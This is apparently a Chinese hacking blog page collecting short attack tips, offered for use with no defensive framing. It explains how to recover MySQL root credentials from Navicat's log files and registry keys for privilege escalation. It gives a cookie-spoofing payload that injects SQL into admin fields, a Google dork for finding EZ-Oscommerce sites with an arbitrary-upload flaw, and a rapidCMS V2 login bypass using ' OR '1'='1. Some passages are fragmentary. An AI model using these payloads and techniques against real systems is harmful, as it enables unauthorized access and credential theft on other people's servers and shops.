凌风[0x0F]'s BloG

你们懂的。。。

http://hi.baidu.com/hnaker/blog/item/3ff5633d46918ff7828b1387.html

新方法SQL注入

navicat是一个比较流行的MySQL管理工具，在很多服务器上都可以找到

有两个方法提权：

1、从日志文件里找密码，navicat会把操作日志（比如加账户）保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt，低版本是安装目录下的logs下LogHistory.txt

2、navicat管理的MySQL服务器信息（一般是root帐户）是存在注册表里的，具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下，导出注册表导入到本机然后星号察看就OK了。。
...

COOKIES欺骗，下面的是COOKIES利用代码：

Sy%5FShops=TFlags=1%2C2%2C3%2C4%2C5%2C11%2C12%_2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C21%2C22%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C41%2C42%2C43%_2C44%2C51%2C52%2C53%2C54%2C55%2C56%2C61%2C62%2C63%2C64&AdminoldFlags=1&Truename=%CE%_DE&AdminFlags=1&AdminPassword='or'='or'&AdminName='or'='or';

转自xhming

这个系统是国内非常流行的视频点播系统，之前的1.5版本漏洞非常多，2.0版本在安全方面有所提高，但是依然有漏洞存在。

EZ-Oscommerce 3.1程序针对其上传进行严格验证和过滤，可以上传任意恶意代码。google :Powered by osCommerce 或者Customized by EZ-Oscommerce

rapidCMS V2 后台登录认证未经过严格过滤，导致万能密码绕过漏洞。

利用方法：

User:xxoo
Pass: ' OR '1'='1

Demo : http://site/admin.php